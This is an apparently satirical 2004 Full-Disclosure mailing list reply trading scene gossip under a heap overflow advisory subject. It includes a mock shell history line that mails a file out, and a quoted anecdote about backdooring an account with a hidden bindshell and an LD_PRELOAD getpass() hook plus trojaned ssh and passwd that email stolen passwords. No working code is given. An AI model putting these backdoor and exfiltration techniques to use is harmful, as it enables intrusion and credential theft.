Re: [Full-Disclosure] H9-0001 Advisory: Sphiro HTTPD remote heap overflow (Rosiello Security)

From: Slotto Corleone (slotto_at_gmail.com)
Date: 04/30/04

  • Next message: bugzilla_at_redhat.com: "[RHSA-2004:173-00] Updated mc packages resolve several vulnerabilities"
    To: Richard Johnson <thief@bugtraq.org>
    Date: Fri, 30 Apr 2004 11:30:20 -0800
    
    

    -- .bash_history from the drunken.fi.st box
    cd GOBBLES_dvdman
    uuencode haxorpc.jpg yo | mail research@bugtraq.org

    --
    Please return dvdman's copyright material before continuing any
    further communication. Thank you.
    On Fri, 30 Apr 2004 00:32:37 -0400, Richard Johnson <thief@bugtraq.org> wrote:
    > 
    > On Thu, Apr 29, 2004 at 03:56:50PM -0700, Slotto Corleone wrote:
    > > - rave gets his account backdoored on kokanin's box. He finds the
    > > obviously placed bindshell stashed as ~/bin/zsh. He laughs and says
    > > the backdoor was lame. Well he obviously missed the getpass()
    > > LD_PRELOAD, ssh, and passwd all on his local account mailing all his
    > > new passwords out. Oh, and he left an exploit (servu.c) in his
    > > directory for the version of servu ftpd he was running on his home
    > > windows machine. Oops.
    > 
    > Care to share any additional information on how this described FreeBSD
    > kernel bug can be exploited?
    > 
    > We are ready to pay top dollar for this information, to whoever comes
    > forward with it.
    > 
    > --
    > Richard Johnson, CISSP
    > Senior Security Researcher
    > iDEFENSE Inc.
    > thief@bugtraq.org
    > 
    > Get paid for security stuff!!!!!!
    > http://www.idefense.com/contributor.html
    > 
    >
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    
